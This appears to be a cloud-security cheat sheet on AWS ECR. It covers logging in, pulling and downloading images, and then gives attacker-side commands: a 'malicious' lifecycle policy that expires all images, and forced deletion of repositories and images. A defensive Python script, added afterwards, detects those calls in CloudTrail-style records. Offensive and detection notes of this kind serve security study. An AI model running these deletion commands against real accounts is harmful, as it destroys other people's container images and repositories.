```bash
# Docker login into ecr
## For public repo (always use us-east-1)
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/<random-id>
## For private repo
aws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
## If you need to access an image from a repo in a different account, in <account_id> set the account number of the other account

# Download
docker pull <account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest
## If you still have the error "Requested image not found"
## It might be because the tag "latest" doesn't exist
## Get valid tags with:
TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
curl -i -H "Authorization: Basic $TOKEN" https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list

# Inspect the image
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0

# Upload (example uploading purplepanda with tag latest)
docker tag purplepanda:latest <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest

# Downloading without Docker
# List digests
aws ecr batch-get-image --repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'

## Download a digest
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
```
After downloading the images, you should check them for sensitive information:
An attacker with any of these permissions can create or modify a lifecycle policy to delete all images in the repository and then delete the entire ECR repository. This results in the loss of all container images stored in the repository.
```bash
# Create a JSON file with the malicious lifecycle policy
echo '{
  "rules": [
    {
      "rulePriority": 1,
      "description": "Delete all images",
      "selection": {
        "tagStatus": "any",
        "countType": "imageCountMoreThan",
        "countNumber": 0
      },
      "action": {
        "type": "expire"
      }
    }
  ]
}' > malicious_policy.json

# Apply the malicious lifecycle policy to the ECR repository
aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json

# Delete the ECR repository
aws ecr delete-repository --repository-name your-ecr-repo-name --force

# Delete the ECR public repository
aws ecr-public delete-repository --repository-name your-ecr-repo-name --force

# Delete multiple images from the ECR repository
aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0

# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
```
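For the defending side, the following is an added example (not part of the original page) that triages CloudTrail-style records for the calls used above: an expire-everything lifecycle policy, a forced repository delete, and batch image deletion. It assumes that `requestParameters` mirrors the API parameter names (`repositoryName`, `lifecyclePolicyText`, `force`, `imageIds`) and that the two `eventSource` values shown are correct; the thresholds, helper names and sample records are constructed for illustration.

```python
import json

ECR_SOURCES = {"ecr.amazonaws.com", "ecr-public.amazonaws.com"}  # assumed eventSource values

def risky_rules(policy_text, min_keep=5, min_days=7):
    """Priorities of rules that expire almost every image (min_days assumes countUnit days)."""
    hits = []
    for rule in json.loads(policy_text).get("rules", []):
        sel = rule.get("selection", {})
        untargeted = rule.get("action", {}).get("type") == "expire" and sel.get("tagStatus") == "any"
        limit = {"imageCountMoreThan": min_keep, "sinceImagePushed": min_days}.get(sel.get("countType"))
        if untargeted and limit is not None and sel.get("countNumber", 0) < limit:
            hits.append(rule.get("rulePriority"))
    return hits

def triage(records):
    """Return (eventName, repositoryName, reason) for each ECR record worth an alert."""
    findings = []
    for rec in (r for r in records if r.get("eventSource") in ECR_SOURCES):
        name, params = rec.get("eventName"), rec.get("requestParameters") or {}
        repo = params.get("repositoryName")
        if name == "PutLifecyclePolicy":
            try:
                bad = risky_rules(params.get("lifecyclePolicyText") or "{}")
            except (ValueError, AttributeError):  # malformed policy text is itself worth a look
                bad = ["unparseable"]
            if bad:
                findings.append((name, repo, f"expire-all rules {bad}"))
        elif name == "DeleteRepository" and params.get("force"):
            findings.append((name, repo, "forced delete"))
        elif name == "BatchDeleteImage":
            findings.append((name, repo, f"{len(params.get('imageIds', []))} image ids"))
    return findings

def _rec(name, source="ecr.amazonaws.com", **params):  # builds a constructed record
    return {"eventSource": source, "eventName": name, "requestParameters": params}
def _policy(tag_status, count_type, number):  # builds a constructed lifecycle policy text
    sel = {"tagStatus": tag_status, "countType": count_type, "countNumber": number}
    return json.dumps({"rules": [{"rulePriority": 1, "selection": sel, "action": {"type": "expire"}}]})

SAMPLE = [  # constructed records, not real logs
    _rec("PutLifecyclePolicy", repositoryName="app", lifecyclePolicyText=_policy("any", "imageCountMoreThan", 0)),
    _rec("PutLifecyclePolicy", repositoryName="web", lifecyclePolicyText=_policy("untagged", "sinceImagePushed", 14)),
    _rec("DeleteRepository", repositoryName="app", force=True),
    _rec("BatchDeleteImage", "ecr-public.amazonaws.com", repositoryName="app", imageIds=[{"imageTag": "latest"}]),
]

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

The routine cleanup policy on the `web` repository (untagged images older than 14 days) is deliberately not flagged, so alerts stay limited to rules that target every image.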